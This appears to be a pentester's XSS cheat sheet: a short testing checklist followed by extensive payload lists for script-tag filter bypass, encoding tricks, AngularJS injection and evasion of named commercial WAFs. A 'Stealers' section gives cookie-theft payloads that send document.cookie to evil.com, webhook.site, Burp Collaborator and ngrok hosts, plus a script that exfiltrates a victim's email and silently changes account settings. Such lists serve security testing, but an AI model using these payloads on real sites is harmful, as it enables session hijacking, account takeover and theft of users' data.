XSS
One thing you should understand when exploiting XSS is the behavior of the application towards specific payloads. The followings can be considered a checklist before exploiting XSS vulnerability:
  • Find the blacklisted/filtered characters. You can use XSS locators for this:
1
'';! - "<XSS>=&{()}
Copied!
  • Observe what tags are blocked by WAF and which keywords are allowed (iframe, img, body etc.)
  • Try Character Encoding (URL encoding, Double URL encoding, UTF-8 Unicode encoding, Long UTF-8 Unicode encoding, Hex encoding etc.)
  • Try XSS using HTML quote encapsulation
  • Try URL string evasion
  • Create the payload list according to the allowed keywords
  • Brute-force the application with the XSS payload list you just created

Payloads

1
XSS Locators:
2
'';!--"<XSS>=&{()}
3
4
Classic Payloads:
5
<svg onload=alert(1)>
6
"><svg onload=alert(1)>
7
<iframe src="javascript:alert(1)">
8
"><script src=data:&comma;alert(1)//
9
10
script tag filter bypass:
11
<svg/onload=alert(1)>
12
<script>alert(1)</script>
13
<script >alert(1)</script>
14
<ScRipT>alert(1)</sCriPt>
15
<%00script>alert(1)</script>
16
<script>al%00ert(1)</script>
17
18
HTML tags:
19
<img/src=x a='' onerror=alert(1)>
20
<IMG """><SCRIPT>alert(1)</SCRIPT>">
21
<img src=`x`onerror=alert(1)>
22
<img src='/' onerror='alert("kalisa")'>
23
<IMG SRC=# onmouseover="alert('xxs')">
24
<IMG SRC= onmouseover="alert('xxs')">
25
<IMG onmouseover="alert('xxs')">
26
<BODY ONLOAD=alert('XSS')>
27
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
28
<SCRIPT SRC=http:/evil.com/xss.js?< B >
29
"><XSS<test accesskey=x onclick=alert(1)//test
30
<svg><discard onbegin=alert(1)>
31
<script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script>
32
<script>image = new Image(); image.src="http://"+document.cookie+"evil.com/";</script>
33
34
Other tags:
35
<BASE HREF="javascript:alert('XSS');//">
36
<DIV STYLE="width: expression(alert('XSS'));">
37
<TABLE BACKGROUND="javascript:alert('XSS')">
38
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
39
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
40
<xss id=x tabindex=1 onactivate=alert(1)></xss>
41
<xss onclick="alert(1)">test</xss>
42
<xss onmousedown="alert(1)">test</xss>
43
<body onresize=alert(1)>”onload=this.style.width=‘100px’>
44
<xss id=x onfocus=alert(document.cookie)tabindex=1>#x’;</script>
45
46
CharCode:
47
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
48
49
if the input is already in script tag:
50
@domain.com">user+'-alert`1`-'@domain.com
51
52
AngularJS:
53
{{constructor.constructor('alert(1)')()}}
54
{{$on.constructor('alert(1)')()}}
55
{{{}.")));alert(1)//"}}
56
{{{}.")));alert(1)//"}}
57
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11 4,116,40,49,41)
58
59
Scriptless:
60
<link rel=icon href="//evil?
61
<iframe src="//evil?
62
<iframe src="//evil?
63
<input type=hidden type=image src="//evil?
64
65
Unclosed Tags:
66
<svg onload=alert(1)//
67
68
DOM XSS:
69
“><svg onload=alert(1)>
70
<img src=1 onerror=alert(1)>
71
javascript:alert(document.cookie)
72
\“-alert(1)}//
73
<><img src=1 onerror=alert(1)>
74
75
Another case:
76
param=abc`;return+false});});alert`xss`;</script>
77
abc`; Finish the string
78
return+false}); Finish the jQuery click function
79
}); Finish the jQuery ready function
80
alert`xss`; Here we can execute our code
81
</script> This closes the script tag to prevent JavaScript parsing errors
Copied!

Restrictions Bypas

1
No parentheses:
2
<script>onerror=alert;throw 1</script>
3
<script>throw onerror=eval,'=alert\x281\x29'</script>
4
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
5
<script>location='javascript:alert\x281\x29'</script>
6
<script>alert`1`</script>
7
<script>new Function`X${document.location.hash.substr`1`}`</script>
8
9
No parentheses and no semicolons:
10
<script>{onerror=alert}throw 1</script>
11
<script>throw onerror=alert,1</script>
12
<script>onerror=alert;throw 1337</script>
13
<script>{onerror=alert}throw 1337</script>
14
<script>throw onerror=alert,'some string',123,'haha'</script>
15
16
No parentheses and no spaces:
17
<script>Function`X${document.location.hash.substr`1`}```</script>
18
19
Angle brackets HTML encoded (in an attribute):
20
“onmouseover=“alert(1)
21
‘-alert(1)-’
22
23
If quote is escaped:
24
‘}alert(1);{‘
25
‘}alert(1)%0A{‘
26
\’}alert(1);{//
27
28
Embedded tab, newline, carriage return to break up XSS:
29
<IMG SRC="jav&#x09;ascript:alert('XSS');">
30
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
31
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
32
33
Other:
34
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>: base64 value which is alert(‘XSS’)
35
Copied!

Encoding

1
Unicode:
2
<script>\u0061lert(1)</script>
3
<script>\u{61}lert(1)</script>
4
<script>\u{0000000061}lert(1)</script>
5
6
Hex:
7
<script>eval('\x61lert(1)')</script>
8
9
HTML:
10
<svg><script>&#97;lert(1)</script></svg>
11
<svg><script>&#x61;lert(1)</script></svg>
12
<svg><script>alert&NewLine;(1)</script></svg>
13
<svg><script>x="&quot;,alert(1)//";</script></svg>
14
\’-alert(1)//
15
16
URL:
17
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
18
19
Double URL Encode:
20
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
21
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
22
23
Unicode + HTML:
24
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
25
26
HTML + URL:
27
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
28
Copied!

WAF Bypass

1
Imperva Incapsula:
2
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E
3
<img/src="x"/onerror="[JS-F**K Payload]">
4
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
5
6
WebKnight:
7
<details ontoggle=alert(1)>
8
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
9
10
F5 Big IP:
11
<body style="height:1000px" onwheel="[DATA]">
12
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
13
<body style="height:1000px" onwheel="[JS-F**k Payload]">
14
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
15
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
16
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
17
18
Barracuda WAF:
19
<body style="height:1000px" onwheel="alert(1)">
20
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
21
22
PHP-IDS:
23
<svg+onload=+"[DATA]"
24
<svg+onload=+"aler%25%37%34(1)"
25
26
Mod-Security:
27
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>
28
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
29
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
30
31
Quick Defense:
32
<input type="search" onsearch="aler\u0074(1)">
33
<details ontoggle="aler\u0074(1)">
34
35
Sucuri WAF:
36
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
37
Copied!

Stealers

1
--stored--
2
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
3
4
<script>
5
document.write('<img src="[URL]?c='+document.cookie+'" />');
6
</script>
7
8
--reflected--
9
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>
10
11
---ninja 1----
12
<script>
13
fetch('https://awdawddawawdd.burpcollaborator.net', {
14
method: 'POST',
15
mode: 'no-cors',
16
body:document.cookie
17
});
18
</script>
19
20
----script 1--GET METHOD----
21
// get some info from a GET request
22
var a = new XMLHttpRequest();
23
a.open("GET", "https://lol.php?xxx=1&ajax=full_email_address", false);
24
a.withCredentials = true;
25
a.send();
26
var email=a.response;
27
28
// exfiltrate to C2
29
var b = new XMLHttpRequest();
30
b.open("GET", "https://xxxxxxxx.ngrok.io/?email="+email);
31
b.send();
32
33
34
---script 2---POST METHOD---
35
// set something
36
var a = new XMLHttpRequest();
37
a.open("POST", "https://xxxx.php?xxxx=1&screen=settings&role=administrator&action=save", false);
38
a.withCredentials = true;
39
a.send("send_email=on&receive_money=on");
40
Copied!

Other lists

https://owasp.org/www-community/xss-filter-evasion-cheatsheet
owasp.org
Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy
WebSecAcademy
XSS (Cross Site Scripting)
HackTricks

Tools

See XSS tools here:
Web Discovery
Red Teaming and Malware Analysis
BeEF - The Browser Exploitation Framework Project

References

A Pentester’s Guide to Cross-Site Scripting (XSS) | Cobalt Blog
Cobalt
Last modified 10mo ago